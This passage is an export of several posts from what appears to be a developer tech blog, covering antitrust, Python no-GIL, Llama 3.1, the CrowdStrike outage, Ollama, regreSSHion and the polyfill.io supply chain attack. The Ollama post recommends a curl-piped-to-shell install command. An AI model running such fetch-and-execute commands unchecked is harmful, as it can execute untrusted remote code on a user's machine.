algorithm. If the remedies in this case actually open up search competition, we might need to think about discoverability more broadly.\nChrome\u0026rsquo;s influence on web standards: Google\u0026rsquo;s search dominance is intertwined with Chrome\u0026rsquo;s browser dominance. While the ruling is specifically about search, any structural remedies could impact Google\u0026rsquo;s ability to leverage Chrome as a distribution channel. This could shift the dynamics in web standards bodies like the W3C.\nAdvertising economics: For those of us who work on ad-supported products, the advertising market is deeply shaped by Google\u0026rsquo;s position. Changes here could alter CPMs, targeting capabilities, and the economics of free-tier products.\nThe Developer Tools Question # Here\u0026rsquo;s what I find most interesting from a practical standpoint: Google provides an enormous amount of free infrastructure to the developer community. Firebase, Google Cloud\u0026rsquo;s free tier, Angular, Go contributions, TensorFlow, Chrome DevTools, Lighthouse — the list goes on. Much of this is funded by search advertising revenue.\nI\u0026rsquo;m not suggesting Google would suddenly shut down these projects, but it\u0026rsquo;s worth considering the second-order effects. If remedies significantly impact Google\u0026rsquo;s revenue structure, we might see changes in how generously they fund open-source projects and developer tools. I\u0026rsquo;ve seen this pattern before with other companies: when the business model shifts, the \u0026ldquo;strategic investments\u0026rdquo; in developer goodwill are often the first things to get re-evaluated.\nRemedies Are Where It Gets Real # The ruling itself is just the beginning. The remedies phase — where the court decides what to actually do about the monopoly — is where things get concrete. Options range from behavioral remedies (stop making exclusive deals) to structural ones (breaking up parts of the company).\nThe most developer-relevant scenario would be a requirement to open up default search placement to competition. Imagine a world where your browser regularly asks which search engine you want to use, similar to what the EU has done with the Digital Markets Act. This could genuinely change how users discover content and, by extension, how we think about building discoverable web applications.\nMy Take # I\u0026rsquo;ve been building web applications since before Google existed, and I\u0026rsquo;ve watched the search landscape consolidate from a dozen viable engines to essentially one. That consolidation made some things simpler — you only need one SEO strategy — but it also created a fragile monoculture.\nThis ruling doesn\u0026rsquo;t change anything overnight. Appeals will take years. But it signals that the era of unchallenged platform dominance is facing real legal headwinds, not just in the EU, but now in the United States as well.\nFor developers, the practical advice is straightforward: don\u0026rsquo;t over-optimize for any single platform. Build for the open web. Make your applications discoverable through multiple channels. And keep an eye on the remedies phase — that\u0026rsquo;s where the real story will unfold.\nThe web was designed to be decentralized. Maybe the courts are finally catching up to that original vision.\n","date":"8 August 2024","externalUrl":null,"permalink":"/posts/240808-google-antitrust-ruling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A federal judge ruled Google maintains an illegal monopoly in search. Here’s what this means for the developer ecosystem.","title":"Google's Antitrust Reckoning — What the Monopoly Ruling Means for Developers","type":"posts"},{"content":"","date":"8 August 2024","externalUrl":null,"permalink":"/categories/industry/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Industry","type":"categories"},{"content":"Python 3.13 is shaping up to be one of the most consequential Python releases in years, and the headline feature isn\u0026rsquo;t a new syntax addition or a standard library module — it\u0026rsquo;s an experimental build mode that removes the Global Interpreter Lock. The free-threaded CPython build, available as an opt-in experimental feature, allows Python threads to run truly concurrently on multiple CPU cores. If you\u0026rsquo;ve been writing Python for any length of time, you understand why this is a big deal.\nThe latest beta dropped this week, and I\u0026rsquo;ve been testing it against some of our data processing workloads. Here\u0026rsquo;s what I\u0026rsquo;ve found and why you should be cautiously optimistic.\nThe GIL Problem, Briefly # For the uninitiated: CPython\u0026rsquo;s Global Interpreter Lock is a mutex that ensures only one thread executes Python bytecode at a time. It exists because CPython\u0026rsquo;s memory management — specifically its reference counting garbage collector — isn\u0026rsquo;t thread-safe. The GIL makes single-threaded code fast and C extension development straightforward, but it means that CPU-bound multithreaded Python code can\u0026rsquo;t utilize multiple cores.\nThis has been Python\u0026rsquo;s most infamous limitation for over two decades. The workarounds are well-known: multiprocessing for CPU-bound parallelism (with the overhead of process creation and inter-process communication), asyncio for I/O-bound concurrency (with the constraint of cooperative scheduling), or writing performance-critical sections in C/Cython/Rust. These solutions work, but they add complexity and friction that developers in languages with real threading take for granted. The broader language ecosystem evolution shows how Go and Rust handle concurrency more elegantly.\nPEP 703, authored by Sam Gross and accepted by the Python Steering Council in late 2023, laid out the roadmap for making the GIL optional. Python 3.13 is the first release to include this as an experimental build option. This follows the pattern of Python 3.14 free-threading initiatives and broader concurrency improvements across the ecosystem.\nWhat\u0026rsquo;s Actually Changed # The free-threaded build (--disable-gil at compile time, or installable via the python3.13t binary in some package managers) replaces the GIL with a combination of fine-grained per-object locks, biased reference counting, and deferred reference counting techniques. The technical implementation is genuinely clever — objects that are only accessed by a single thread use a fast, lock-free reference counting path, and the locking overhead only kicks in when objects are actually shared between threads.\nThe result is that pure Python threads can now execute concurrently on multiple cores. In my testing with a simple CPU-bound workload — computing Fibonacci numbers across multiple threads — I\u0026rsquo;m seeing near-linear scaling up to the number of available cores. That\u0026rsquo;s something that was literally impossible in standard CPython before. This aligns with trends in developer tooling and language runtime maturity where performance and concurrent execution are becoming table-stakes.\nimport threading import time def cpu_bound_work(n): \u0026#34;\u0026#34;\u0026#34;Simple CPU-bound computation\u0026#34;\u0026#34;\u0026#34; total = 0 for i in range(n): total += i * i return total threads = [] start = time.perf_counter() for _ in range(8): t = threading.Thread(target=cpu_bound_work, args=(10_000_000,)) threads.append(t) t.start() for t in threads: t.join() elapsed = time.perf_counter() - start On my 8-core machine, this runs roughly 6-7x faster with the free-threaded build compared to standard CPython. With the GIL, adding more threads doesn\u0026rsquo;t help at all for CPU-bound work — it actually makes things slightly slower due to thread scheduling overhead.\nThe Compatibility Question # Here\u0026rsquo;s where things get complicated. The free-threaded build is experimental for good reason. C extensions that rely on the GIL for thread safety — which is most of them — may need modifications to work correctly. NumPy, pandas, and the scientific Python ecosystem have been working on compatibility, but it\u0026rsquo;s a significant effort.\nThe Python C API has been extended with new functions for working in a free-threaded world. Extension authors need to audit their code for thread safety, use the new Py_mod_gil slot to declare GIL requirements, and potentially add locking around shared mutable state that was previously protected implicitly by the GIL.\nFor pure Python code, the transition is smoother but not seamless. Code that was accidentally thread-safe due to the GIL may have latent race conditions that become actual bugs in the free-threaded build. If you\u0026rsquo;ve ever written to a shared dictionary from multiple threads thinking \u0026ldquo;the GIL makes this safe\u0026rdquo; — and I\u0026rsquo;ve seen plenty of code that does — you\u0026rsquo;ll need to add proper synchronization.\nPerformance Implications # The free-threaded build carries a performance overhead for single-threaded code. In the current beta, single-threaded workloads run approximately 5-10% slower than standard CPython due to the overhead of the fine-grained locking infrastructure, even when no threading is used. The CPython team is actively working to reduce this gap, and it\u0026rsquo;s expected to narrow significantly before the final release and in subsequent versions.\nThis trade-off is a core part of why the feature is opt-in and experimental. For workloads that don\u0026rsquo;t benefit from true threading — which is a lot of Python workloads — the GIL-enabled build remains the better choice. The long-term vision, as outlined in PEP 703, is to eventually make the free-threaded build the default, but only once the performance gap is negligible and ecosystem compatibility is broad.\nMy Take # I\u0026rsquo;ve been writing Python since the 1.5 days, and the GIL has been a constant companion — sometimes a helpful simplification, often a frustrating constraint. Seeing true concurrent threading work in CPython feels slightly surreal, like watching a fundamental law of the Python universe get rewritten.\nBut I want to temper the excitement with realism. This is an experimental feature in a beta release. The ecosystem needs time to adapt, the performance overhead for single-threaded code needs to shrink, and developers need to learn proper concurrent programming patterns that the GIL previously let them ignore. The transition will take years, not months.\nThat said, the direction is clear and the execution so far is impressive. Sam Gross and the CPython team have found a path that doesn\u0026rsquo;t sacrifice backward compatibility — the GIL build remains the default, and existing code continues to work exactly as before. The free-threaded build is an opt-in door to a future where Python\u0026rsquo;s threading story is genuinely competitive.\nFor now, I\u0026rsquo;d recommend trying the free-threaded build with your test suite to identify any latent threading issues in your code. Don\u0026rsquo;t deploy it to production — it\u0026rsquo;s not ready for that. But start thinking about what real threading could enable in your Python projects. For data pipelines, web scrapers, and compute-heavy backends, the possibilities are exciting.\nPython 3.13 final is expected in October. I\u0026rsquo;ll be watching the free-threaded story closely.\n","date":"1 August 2024","externalUrl":null,"permalink":"/posts/240801-python-3-13-free-threaded-nogil/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.13’s experimental free-threaded mode removes the Global Interpreter Lock, and it could fundamentally change how we write concurrent Python.","title":"Python 3.13 and the No-GIL Experiment — Threading's Biggest Shakeup in Decades","type":"posts"},{"content":"Two days ago, Meta released Llama 3.1, and the headliner is a 405 billion parameter model that Meta claims is competitive with GPT-4o and Claude 3.5 Sonnet on major benchmarks. The model ships under an updated Llama license that\u0026rsquo;s remarkably permissive for something this capable. This isn\u0026rsquo;t a research preview or a limited access program — it\u0026rsquo;s weights you can download, a license you can build products on, and a model that narrows the gap between open and closed AI to a margin that matters.\nI\u0026rsquo;ve spent the past two days running the smaller variants and reading the technical details. Here\u0026rsquo;s what I think this means for those of us building with AI.\nThe Model Family # Llama 3.1 comes in three sizes: 8B, 70B, and the new 405B. All three support a 128K token context window, which is a significant jump from Llama 3\u0026rsquo;s 8K. The architecture is dense transformer — no mixture-of-experts tricks — which means the 405B model genuinely has 405 billion active parameters during inference. Meta reports training on over 15 trillion tokens using a cluster of 16,384 H100 GPUs.\nFor context on the broader LLM landscape, you might be interested in how GPT-4o and other commercial models stack up against these open-source alternatives, as well as the emergence of reasoning models that push beyond pure scaling.\nThe benchmark results are genuinely impressive. On MMLU, the 405B scores 87.3%, putting it in the same tier as GPT-4o (88.7%) and Claude 3.5 Sonnet (88.7%). On HumanEval coding benchmarks, it hits 89.0%. Math reasoning, multilingual capability, and long-context performance all show competitive numbers. Are benchmarks the whole story? No. But they signal that we\u0026rsquo;re not talking about a consolation-prize open model anymore.\nThe 8B and 70B variants are also substantially improved over their Llama 3 predecessors, benefiting from the longer training and expanded training data. The 8B model in particular is remarkably capable for its size, and it\u0026rsquo;s the one most developers will actually run.\nThe License Matters # Previous Llama releases came with restrictions that made lawyers nervous — usage caps based on monthly active users, geographic limitations, and requirements that made enterprise adoption complicated. The Llama 3.1 Community License Agreement is cleaner. You can use it commercially, fine-tune it, and distribute derivatives. The main restriction is the 700 million monthly active user threshold, which effectively only applies to the largest tech companies.\nFor the vast majority of startups, enterprises, and individual developers, this is functionally an open license. You can build products, offer API services, create fine-tuned variants for specific domains, and do so without negotiating a commercial agreement with Meta.\nThis licensing shift is as important as the technical capability. An amazing model that you can\u0026rsquo;t legally deploy is an academic curiosity. A competitive model with clear commercial rights is a platform.\nWhat This Means for the Ecosystem # The immediate impact is on the fine-tuning and specialization ecosystem. Every company that\u0026rsquo;s been fine-tuning Llama 2 70B or Llama 3 70B for domain-specific tasks now has a base model that\u0026rsquo;s dramatically more capable. Medical AI, legal document analysis, code generation for specific frameworks, customer service automation — all of these use cases get an upgrade by simply swapping the base model.\nThe 128K context window opens up use cases that were previously limited to commercial APIs. Processing entire codebases, analyzing long documents, maintaining extended conversation context — these become possible with a model you control entirely.\nI\u0026rsquo;m particularly interested in what happens when organizations start fine-tuning the 405B model. With techniques like QLoRA, fine-tuning a model this large is feasible on a cluster of high-end GPUs. The resulting specialized models could be truly exceptional in narrow domains. We\u0026rsquo;ve already seen what fine-tuning can do with smaller models — applying those techniques to a 405B base model should yield remarkable results.\nRunning It Practically # Let\u0026rsquo;s talk hardware reality. The 405B model, even quantized to 4-bit, requires approximately 200GB of memory. You\u0026rsquo;re looking at multiple high-end GPUs — think a cluster of A100s or H100s — or a very large CPU memory footprint with significantly slower inference. This isn\u0026rsquo;t something you\u0026rsquo;re running on your workstation.\nThe 70B model is the practical sweet spot for most organizations. Quantized to 4-bit, it fits on a single 48GB GPU or a pair of 24GB consumer cards. The 8B model runs comfortably on any modern GPU with 8GB+ VRAM, making it accessible for individual developers.\nFor serving the 405B, you\u0026rsquo;re realistically looking at cloud GPU instances — AWS p4d/p5, GCP A3, or equivalent — or working with inference providers who are already spinning up Llama 3.1 endpoints. Together AI, Fireworks, Groq, and others have announced support this week. The cost per token through these providers is substantially lower than equivalent commercial API pricing, which is part of Meta\u0026rsquo;s strategic play — commoditize the model layer to drive down AI costs across the industry.\nMy Take # I\u0026rsquo;ve been following the open-source AI space since the original Llama leak in early 2023, and Llama 3.1 feels like a genuine inflection point. For the first time, there\u0026rsquo;s an open model that isn\u0026rsquo;t just \u0026ldquo;good for an open model\u0026rdquo; — it\u0026rsquo;s competitive with the best commercial offerings on many tasks. This democratization of AI capability aligns with broader advances in foundation model architecture and the competitive landscape.\nMeta\u0026rsquo;s strategy is increasingly clear: by making frontier AI models freely available, they commoditize the model layer and ensure that AI capability isn\u0026rsquo;t controlled by a small number of API providers. Whether you view this as genuine commitment to open science or strategic competitive positioning against OpenAI and Google, the outcome for developers is the same — more capable tools with more deployment flexibility.\nFor my own projects, I\u0026rsquo;m planning to evaluate the 70B model as a replacement for several API-based workflows where data privacy is a concern. The 128K context window alone makes it viable for document processing tasks that previously required GPT-4 Turbo. And for the fine-tuning work I\u0026rsquo;ve been experimenting with, having a stronger base model changes the calculus on what\u0026rsquo;s achievable. The combination of open models and advanced training techniques is enabling new possibilities.\nThe era of open frontier AI models has arrived, and that\u0026rsquo;s something worth paying attention to, regardless of which side of the open-vs-closed debate you fall on. The ecosystem continues to evolve with infrastructure innovations supporting this transition.\n","date":"25 July 2024","externalUrl":null,"permalink":"/posts/240725-meta-llama-3-1-open-source/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta releases Llama 3.1 with a 405 billion parameter model under a permissive license, making frontier-class AI genuinely open for the first time.","title":"Llama 3.1 405B — Meta Goes All-In on Open-Source AI","type":"posts"},{"content":"I woke up this morning to a flood of messages from colleagues across multiple time zones, all saying variations of the same thing: \u0026ldquo;Everything is down.\u0026rdquo; Airports. Banks. Hospitals. Retail chains. Emergency services. Millions of Windows machines worldwide stuck in a blue screen of death boot loop, and the culprit isn\u0026rsquo;t ransomware or a nation-state attack — it\u0026rsquo;s a botched content update from CrowdStrike, one of the world\u0026rsquo;s most widely deployed endpoint security platforms. This is the nightmare scenario that security researchers warned about after the SolarWinds breach: a single vendor update affecting massive portions of global infrastructure.\nAs I write this, the situation is still unfolding. But the scale is already staggering, and the implications for how we think about software supply chains and kernel-level access deserve immediate discussion.\nWhat Happened # CrowdStrike\u0026rsquo;s Falcon sensor, which runs as a kernel-mode driver on Windows systems, received a \u0026ldquo;channel file\u0026rdquo; content update — specifically, a file named C-00000291*.sys — that caused the sensor to trigger a logic error resulting in a system crash. Because the driver loads early in the boot process and runs at the kernel level, the crash occurs before Windows can fully start, creating an unrecoverable boot loop on affected machines.\nThe update was pushed automatically through CrowdStrike\u0026rsquo;s cloud-based update mechanism. Unlike traditional software patches that might go through staging and approval workflows, these content updates — which contain detection signatures and behavioral rules — are designed to deploy rapidly to respond to emerging threats. That rapid deployment capability, which is normally a security advantage, became the vector for one of the largest IT outages in recent memory.\nCrowdStrike has confirmed the issue and published a workaround: boot into Safe Mode or the Windows Recovery Environment and delete the offending channel file from C:\\Windows\\System32\\drivers\\CrowdStrike\\. The problem is that this requires physical or console access to each affected machine. For organizations with thousands of endpoints — many of them remote — that\u0026rsquo;s a recovery measured in days, not hours.\nThe Kernel Access Question # This incident puts a spotlight on a fundamental tension in endpoint security. CrowdStrike\u0026rsquo;s Falcon sensor, like most enterprise EDR products, runs as a kernel-mode driver specifically because that level of access is necessary to monitor for rootkits, detect kernel-level exploits, and ensure that malware can\u0026rsquo;t simply terminate the security agent. It\u0026rsquo;s a defensible architectural choice for security, but it comes with the inherent risk that any bug in kernel-mode code can take down the entire system.\nMicrosoft has been gradually trying to move security vendors out of the kernel with features like Virtualization-Based Security and the Microsoft Virus Initiative\u0026rsquo;s guidelines. But the reality is that most enterprise security vendors still operate at the kernel level, and their customers rely on that deep access for protection against sophisticated threats.\nThe uncomfortable truth is that every kernel-mode driver on your system is a potential single point of failure. Your security vendor, your storage driver, your virtualization hypervisor — they all run with the same privileges as the operating system itself.\nThe Staging Problem # What strikes me hardest about this incident is the update delivery model. Content updates — as opposed to agent software updates — typically bypass traditional change management processes. The security argument is compelling: when a new zero-day exploit is circulating, you want your detection signatures updated in minutes, not days. CrowdStrike\u0026rsquo;s rapid response capability is one of the things their customers pay for.\nBut this creates an implicit trust relationship where a single vendor can push code changes to millions of machines simultaneously, without individual customer approval, and that code runs with the highest possible system privileges. The blast radius of a mistake is\u0026hellip; well, we\u0026rsquo;re seeing it today.\nI\u0026rsquo;ve spent years advocating for progressive deployment strategies — canary releases, blue-green deployments, staged rollouts with automated rollback. These practices are standard for web applications. They should be non-negotiable for anything that touches kernel space. A 1% canary deployment with a 30-minute bake time would have contained this issue to a fraction of affected machines and given CrowdStrike time to detect the problem and halt the rollout. The broader supply chain security lessons we\u0026rsquo;ve learned over the past years all point to the same conclusion: trust but verify, and always maintain a recovery path.\nThe Recovery Challenge # For the organizations currently dealing with this, the recovery process is brutal. Each affected machine needs manual intervention. You can\u0026rsquo;t push a fix remotely to a machine that won\u0026rsquo;t boot. If your fleet is managed with BitLocker drive encryption — which it should be — you need the recovery keys before you can even access Safe Mode, and those recovery keys might be stored in Active Directory on a server that\u0026rsquo;s\u0026hellip; also affected.\nThis cascading dependency problem is something I\u0026rsquo;ve seen in disaster recovery planning exercises, but rarely at this scale in production. It\u0026rsquo;s a painful reminder that recovery procedures need to account for scenarios where your management infrastructure is itself impacted.\nCloud-hosted workloads fare somewhat better — VMs can often be rescued by mounting their disks to a clean instance and removing the offending file. But for physical endpoints — laptops, desktops, point-of-sale terminals, airport check-in kiosks — it\u0026rsquo;s hands-on-keyboard for every single machine.\nMy Take # I want to be clear: this isn\u0026rsquo;t an argument against CrowdStrike specifically, or against EDR products generally. Endpoint security is essential, and running at the kernel level is a legitimate architectural decision. But this event should fundamentally change how the industry thinks about update deployment for privileged software.\nEvery vendor shipping kernel-mode code needs to answer three questions after today:\nDo you have staged rollout for all update types, including content/signature updates? What is your maximum blast radius if an update is defective? How do your customers recover when your software prevents their systems from booting? For those of us on the operations side, this is also a reminder about fleet diversity and recovery planning. Having a tested, offline recovery procedure for your critical systems isn\u0026rsquo;t paranoia — after today, it\u0026rsquo;s basic hygiene. The CrowdStrike incident follows the same pattern as other major security and infrastructure failures: a single point of failure, rapid proliferation, and a recovery window measured in days instead of hours.\nI\u0026rsquo;ll be writing more about this as the full picture emerges. For now, if you\u0026rsquo;re in the middle of recovery, CrowdStrike\u0026rsquo;s official remediation guidance is your best resource. Hang in there.\n","date":"18 July 2024","externalUrl":null,"permalink":"/posts/240718-crowdstrike-global-outage/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A faulty CrowdStrike Falcon sensor update has caused one of the largest IT outages in history, bricking millions of Windows machines worldwide.","title":"The CrowdStrike Outage — When a Security Update Takes Down the World","type":"posts"},{"content":"Something quietly remarkable has happened in the AI tooling space over the past six months. While the headlines focus on GPT-4o, Claude 3.5, and the latest frontier model benchmarks, a parallel movement has been building momentum: running large language models locally, on your own hardware, with genuinely useful results. At the center of this movement is Ollama, a tool that has made local LLM usage almost embarrassingly easy.\nI\u0026rsquo;ve been running Ollama on my development workstation for the past few months, and this week I finally moved it into a more permanent role in my workflow. It\u0026rsquo;s worth talking about why.\nFrom Curiosity to Utility # When I first tried running local models last year, the experience was rough. Model formats were a mess, GGML was giving way to GGUF, quantization was a dark art, and actually getting inference running required cobbling together Python scripts and hoping your CUDA drivers cooperated. It worked, but it felt like a science project.\nOllama changed that equation entirely. A single binary, a clean CLI, and a model library that\u0026rsquo;s reminiscent of Docker Hub. ollama pull llama3 and you\u0026rsquo;re running Meta\u0026rsquo;s latest model locally. ollama pull codellama for code assistance. ollama pull mistral for a capable general-purpose model. The experience is polished in a way that signals real engineering effort behind the scenes.\nThe model library now hosts dozens of models from multiple providers — Meta\u0026rsquo;s Llama 3, Mistral\u0026rsquo;s models, Google\u0026rsquo;s Gemma, Microsoft\u0026rsquo;s Phi-3, and many community fine-tunes. The quantized versions run respectably on consumer hardware. I\u0026rsquo;m getting useful code completions from CodeLlama 13B on a machine with an RTX 4070, and Llama 3 8B handles general Q\u0026amp;A and text processing tasks without breaking a sweat.\nWhy Local Matters # The obvious argument for local LLMs is privacy and data sovereignty. When you\u0026rsquo;re working with proprietary code, client data, or anything covered by an NDA, sending it to a third-party API isn\u0026rsquo;t always an option. I\u0026rsquo;ve worked with enough enterprise clients to know that the legal review for a new AI API vendor can take longer than the project itself. Running the model locally sidesteps that conversation entirely.\nBut there are less obvious benefits too. Latency is one — inference on a local GPU eliminates the network round-trip and API queue time. For interactive coding assistance, the difference between 200ms and 2 seconds is the difference between flow state and frustration. Cost is another — if you\u0026rsquo;re making hundreds of API calls per day for code review, documentation, or test generation, those tokens add up fast. A one-time hardware investment amortizes nicely.\nReliability matters as well. I can\u0026rsquo;t count the number of times I\u0026rsquo;ve been in the middle of a debugging session only to have an API return a rate limit error or a 503. My local Ollama instance has been running for weeks without a hiccup.\nThe Developer Tooling Ecosystem # What\u0026rsquo;s really accelerated local LLM adoption is the ecosystem growing around Ollama. Continue provides IDE integration that connects to your local Ollama instance for code completion and chat, working with both VS Code and JetBrains. Open WebUI gives you a ChatGPT-style interface backed by local models. And because Ollama exposes an OpenAI-compatible API endpoint, any tool that works with the OpenAI API can be pointed at your local instance with a URL change.\nI\u0026rsquo;ve been using Continue with VS Code connected to a local CodeLlama instance for the past two weeks, and it\u0026rsquo;s\u0026hellip; good. Not GPT-4 good, but good enough for autocomplete, boilerplate generation, and explaining unfamiliar code. The 13B quantized model hits a sweet spot between quality and speed on my hardware.\nThe Docker integration is particularly elegant. Ollama publishes official Docker images, so spinning up a model server on any machine in your infrastructure is a docker run command. I\u0026rsquo;ve been experimenting with running it as a sidecar service in our development Kubernetes cluster, giving the whole team access to a shared local model without any API keys or external dependencies.\nThe Limitations Are Real # I want to be honest about where local models fall short. For complex reasoning, multi-step problem solving, or generating large amounts of novel code, the frontier API models are still meaningfully better. The 7B and 13B parameter models that run comfortably on consumer hardware are impressive for their size, but they\u0026rsquo;re not magic. They hallucinate more, lose context faster, and struggle with nuanced instructions.\nThe hardware requirements also create an accessibility gap. Running a useful model requires a decent GPU — realistically 8GB+ VRAM for the smaller models and 16GB+ for anything larger. That\u0026rsquo;s not unusual for a developer workstation in 2024, but it\u0026rsquo;s not universal either. CPU-only inference works but is painfully slow for anything interactive.\nMy Take # I think we\u0026rsquo;re at an inflection point for local AI tooling. Ollama has done for local LLMs what Docker did for containers — taken something that was technically possible but operationally painful and made it accessible. The models aren\u0026rsquo;t going to replace cloud APIs for everything, but they don\u0026rsquo;t need to. They need to be good enough for the 80% of daily tasks where privacy, latency, and cost matter more than peak capability.\nMy current setup is hybrid: local Ollama for code completion, quick lookups, and data processing tasks that involve sensitive code, with a cloud API for the complex reasoning tasks that justify the cost and latency. It\u0026rsquo;s the best of both worlds, and I suspect this pattern will become the default for most development teams within a year.\nIf you haven\u0026rsquo;t tried Ollama yet, set aside thirty minutes this week. curl -fsSL https://ollama.com/install.sh | sh and then ollama pull llama3. You might be surprised at how useful it is.\n","date":"11 July 2024","externalUrl":null,"permalink":"/posts/240711-ollama-local-llm-revolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Local LLM tooling has matured rapidly, with Ollama leading the charge. Here’s why self-hosted AI is becoming a serious option for developers.","title":"Ollama and the Rise of Local LLMs — Why Running AI on Your Own Hardware Matters","type":"posts"},{"content":"If you run Linux servers — and let\u0026rsquo;s be honest, who among us doesn\u0026rsquo;t — you need to pay attention to CVE-2024-6387, disclosed this week by Qualys. Dubbed \u0026ldquo;regreSSHion,\u0026rdquo; this vulnerability is a signal handler race condition in OpenSSH\u0026rsquo;s server that can lead to unauthenticated remote code execution as root. Yes, you read that correctly. Unauthenticated. Root. On the thing that guards the front door to virtually every server on the internet.\nWhat Makes regreSSHion Different # We\u0026rsquo;ve seen OpenSSH vulnerabilities before, but this one carries a particular sting. The underlying bug is a regression of CVE-2006-5051, a vulnerability that was patched eighteen years ago. Somewhere along the way — specifically in OpenSSH 8.5p1, released in March 2021 — a code change accidentally reintroduced the vulnerable condition. The race condition sits in the SIGALRM handler during authentication timeout processing, where async-signal-unsafe functions like syslog() get called in a signal handler context.\nFor those of us who\u0026rsquo;ve written C for decades, signal handler safety is one of those lessons you learn early and respect forever. The list of async-signal-safe functions is deliberately short for a reason. When a signal handler calls malloc() or free() indirectly through logging functions, you\u0026rsquo;re playing with fire in the form of heap corruption.\nThe Scope of Exposure # OpenSSH versions from 8.5p1 through 9.7p1 are affected if running on glibc-based Linux systems. That\u0026rsquo;s a lot of servers. Qualys identified approximately 14 million potentially vulnerable OpenSSH instances exposed to the internet through Shodan and Censys searches. The practical exploitation difficulty is non-trivial — the Qualys team reportedly needed around 10,000 connection attempts on average to win the race on a 32-bit system, and 64-bit exploitation with ASLR is considerably harder. But \u0026ldquo;hard to exploit\u0026rdquo; and \u0026ldquo;impossible to exploit\u0026rdquo; are very different things, especially when the payoff is root access.\nThe versions before 4.4p1 are also vulnerable unless they were patched for the original CVE-2006-5051. OpenBSD is explicitly not affected due to its secure signal handling mechanisms — something the OpenBSD team has quietly gotten right for years.\nPatching and Mitigation # OpenSSH 9.8p1, released on July 1, fixes the vulnerability. If you can\u0026rsquo;t patch immediately, setting LoginGraceTime 0 in your sshd_config eliminates the race condition by disabling the authentication timeout. The trade-off is that this makes your server susceptible to denial-of-service through connection exhaustion, as unauthenticated sessions will never time out. It\u0026rsquo;s not ideal, but it\u0026rsquo;s better than RCE.\nFor those running configuration management — Ansible, Puppet, Chef, or whatever your shop prefers — this is the moment where having automated patching pipelines pays for itself. I had our staging environments patched within two hours of the advisory going public, and production followed after a quick smoke test. If you\u0026rsquo;re still SSH-ing into boxes manually to run apt upgrade, I\u0026rsquo;d argue this CVE is your sign to invest in automation.\nThe Regression Problem # What really gets me about regreSSHion isn\u0026rsquo;t the vulnerability itself — it\u0026rsquo;s the regression. We fixed this class of bug in 2006. Someone (and I\u0026rsquo;m not pointing fingers at any individual contributor) made a change in 2021 that undid that fix, and it took three years for anyone to catch it.\nThis is a systemic problem in software maintenance. Regression testing for security properties is genuinely hard. A unit test might verify that authentication works correctly, but how do you automatically test that a signal handler doesn\u0026rsquo;t call async-signal-unsafe functions? Static analysis tools can catch some of these patterns, but they generate enough false positives in large C codebases that findings get ignored.\nI\u0026rsquo;ve been bitten by similar regressions in my own projects over the years, though thankfully never with stakes this high. The lesson I keep relearning: when you fix a security bug, write a comment explaining why the code must remain this way, and if possible, add a test that will scream if someone changes it.\nMy Take # The OpenSSH project remains one of the most impressive pieces of security-critical open source software in existence. One regression in eighteen years, in software that runs on effectively every Linux server on the planet, is a remarkable track record. But this CVE is a reminder that even the best projects need more eyes, more static analysis, and more paranoia about regression.\nIf you\u0026rsquo;re a sysadmin or DevOps engineer reading this on a holiday week, I\u0026rsquo;m sorry — go patch your servers. If you\u0026rsquo;re a developer, take a moment to look at your own signal handling code. And if you\u0026rsquo;re running OpenSSH on OpenBSD, enjoy your long weekend.\nPatch, verify, and update your inventories. This one matters.\n","date":"4 July 2024","externalUrl":null,"permalink":"/posts/240704-regresshion-openssh-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2024-6387 reveals a critical remote code execution flaw in OpenSSH, and it’s a regression from a fix made back in 2006.","title":"regreSSHion — A Wake-Up Call Hiding in Plain Sight","type":"posts"},{"content":"If you\u0026rsquo;re running a website that includes a script tag pointing to cdn.polyfill.io, stop reading this and remove it immediately. Seriously. The polyfill.io domain — which has been serving JavaScript polyfills to over 100,000 websites — was acquired by a Chinese company called Funnull earlier this year, and this week security researchers at Sansec confirmed that the domain is now injecting malicious code into websites. The code redirects mobile users to scam sites using a sophisticated detection mechanism that avoids triggering on admin browsers, web crawlers, or analytics tools.\nThis is one of the most impactful supply chain attacks we\u0026rsquo;ve seen in the web ecosystem, and it highlights a fundamental problem with how we\u0026rsquo;ve been building websites for over a decade.\nWhat Happened # Polyfill.io was originally created by Andrew Betts at the Financial Times as an open-source service. It served JavaScript polyfills — compatibility code that adds modern browser features to older browsers. The service was simple and useful: include one script tag, and your site would automatically serve the right polyfills based on the visitor\u0026rsquo;s browser. At its peak, polyfill.io was used by over 100,000 websites.\nIn February 2024, the polyfill.io domain and associated GitHub account were acquired by a company called Funnull, which operates a CDN primarily serving Chinese markets. Andrew Betts immediately warned on social media that he had no involvement with the sale and recommended removing the dependency. Cloudflare and Fastly both set up alternative endpoints to serve polyfills safely.\nDespite these warnings, tens of thousands of sites continued loading scripts from cdn.polyfill.io. This week, Sansec\u0026rsquo;s analysis confirmed the worst-case scenario: the domain is now serving modified JavaScript that includes malicious code. The injected code is sophisticated — it only activates on mobile devices, uses timing-based delays to avoid detection, and specifically avoids executing when it detects web analytics tools, ad tech platforms, or known web crawlers.\nThe Technical Details # The malicious code injection is cleverly implemented. The polyfill.io CDN still serves legitimate polyfill code, but periodically injects additional JavaScript that:\nFingerprints the visitor: checks the User-Agent string for mobile browsers, specifically targeting Android devices Avoids detection: checks for the presence of analytics tools (Google Analytics, Google Tag Manager), web crawlers (Googlebot), and developer tools before activating Uses timing obfuscation: delays execution and only triggers on certain page loads, making it harder to reproduce consistently Redirects to scam sites: sends mobile users to fake Google Analytics domains that lead to sports betting and other scam sites The sophistication of the evasion techniques means that most automated monitoring tools wouldn\u0026rsquo;t catch the injection. If you\u0026rsquo;re testing your site from a desktop browser with developer tools open, the malicious code deliberately doesn\u0026rsquo;t execute. This is social engineering at the infrastructure level.\nThe Deeper Problem: CDN Trust # This attack exploits a fundamental weakness in web architecture: the implicit trust we place in third-party script sources. When you include a \u0026lt;script src=\u0026quot;https://cdn.example.com/library.js\u0026quot;\u0026gt; tag in your HTML, you\u0026rsquo;re giving that domain the ability to execute arbitrary code in your users\u0026rsquo; browsers. If that domain changes hands, serves compromised code, or is hijacked, you have no protection.\nWe\u0026rsquo;ve 